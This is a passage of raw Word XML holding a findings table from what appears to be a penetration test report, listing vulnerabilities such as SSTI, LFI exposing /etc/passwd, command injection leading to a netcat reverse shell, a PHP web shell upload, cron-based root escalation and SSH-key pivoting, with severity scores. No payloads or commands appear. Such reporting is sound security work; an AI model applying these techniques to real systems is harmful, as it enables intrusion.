              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08D2EA17" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E6B29C8" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102EA4B1" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6870D544" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BB29008" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC2338" w:rsidRPr="00D77DFE" w14:paraId="2509D663" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39F90CC4" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="226B8010" w14:textId="476E52FE" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSTI</w:t>
            </w:r>
            <w:r w:rsidR="00395410" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r w:rsidR="00395410" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> t</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>emplate_renderer.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="111CBCE2" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1686E021" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F51040A" w14:textId="35A519C8" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="00812034" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Leading to server information disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7214DA5B" w14:textId="6B713BB6" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6"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9.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w14:paraId="105C6A3E" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29F9EC23" w14:textId="44647B34"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73E4B275" w14:textId="35C37254" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sensitive credentials exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="279F381A"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56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22381231"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3777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C1EA5FC" w14:textId="249B6EA9" w:rsidR="003F04E6"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Gaining access to tomcat manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1ED299A1" w14:textId="1667F97B" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6"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9.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w14:paraId="04EF9948" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30DAAD7A" w14:textId="76D807B0"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="503DEFB2" w14:textId="3B7913EC" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LFI / Path Traversal in file_viewer.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7321595A"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56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="616DBBCB"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3777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49CA3C61" w14:textId="6D93E606" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="00812034" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exposing /etc/passwd and other files </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E7B22B6" w14:textId="3711A687" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6"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8.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w14:paraId="7B39C7A9" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14AB2975" w14:textId="72ADAA0F"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05623CC8" w14:textId="4864032C"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Command Injection in nslookup tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24C27EE1"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56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="548A3662"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3777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="555533BA" w14:textId="09EF55F3" w:rsidR="003F04E6"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Using reverse shell to get access using netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40AE5683" w14:textId="4695FA88" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6"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8.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w14:paraId="0BA9BF5E" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D55F4C9" w14:textId="0A1F2908"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D5E0157" w14:textId="77777777" w:rsidR="003B63B5"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 xml:space="preserve">Unauthorized Modification </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="259C9E49" w14:textId="6CD1F2D7"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of Scheduled Jobs (Cron)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04711324"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56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F7FD89"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3777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44C61FC0" w14:textId="3E6DE9A8" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Leading to Root Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FBCDE51" w14:textId="02DF2F1F" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6"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7.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w14:paraId="0AF5847B" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BD806F5" w14:textId="07E80CCC"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="598FDD1D" w14:textId="0B069045" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2020-1938 (Ghostcat) Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F2281F7"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56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69E0D82A"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3777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71D1B1C6" w14:textId="04B3303E" w:rsidR="003F04E6"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 xml:space="preserve">Exposing sensitive data on the server side </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="149DF610" w14:textId="08CA65EC" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6"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7.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w14:paraId="5666E4F2" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CD10F4E" w14:textId="446A06E2" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B44D8E9" w14:textId="21000D8E" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="005870BA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSRF leads to access local web app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B42379D"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56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="265C5B20" w14:textId="77777777" w:rsidR="003F04E6" w:rsidRPr="00D77DFE" w:rsidRDefault="003F04E6" w:rsidP="005870BA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3777" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4020B357" w14:textId="203AA457" w:rsidR="003F04E6"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Allow access internal services (ports 631 and 8081)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="418CECD8" w14:textId="49B6BD1C" w:rsidR="003F04E6"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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w14:paraId="062FA263" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5721326D" w14:textId="6C756922"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F98528B" w14:textId="2AD8C7E3"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Weak obfuscation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01A37B43"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77BC67DE"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11E9A823" w14:textId="2FB9A09D"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Due to cryptographic failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BE408BA" w14:textId="0D63B2F0"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7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w14:paraId="6DCBE3D0" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="273D2280" w14:textId="41EF87F1"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F615380" w14:textId="49C3DE2D"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Remote Code Execution via uploaded php web shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03CD4EE3"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765817D4"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2C971727" w14:textId="2473F67C"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Upload shell in tomcat manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B6005D1" w14:textId="4AE63B33"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6.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w14:paraId="41CBCA62" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C0771A6" w14:textId="5F052F4C"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2849" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="049FB7CA" w14:textId="006A98B6"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Pivoting via Exposed SSH Private Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E5A629F"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6C866E56"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7C43CDC1" w14:textId="4FBED3B0"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The tester exploited a new machine which is accessible only from 10.0.3.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50395056" w14:textId="5BB8EF7D"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6.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222BDD" w:rsidRPr="00D77DFE" w14:paraId="420F2BB3" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68A32C79" w14:textId="7FDEAB4D"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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
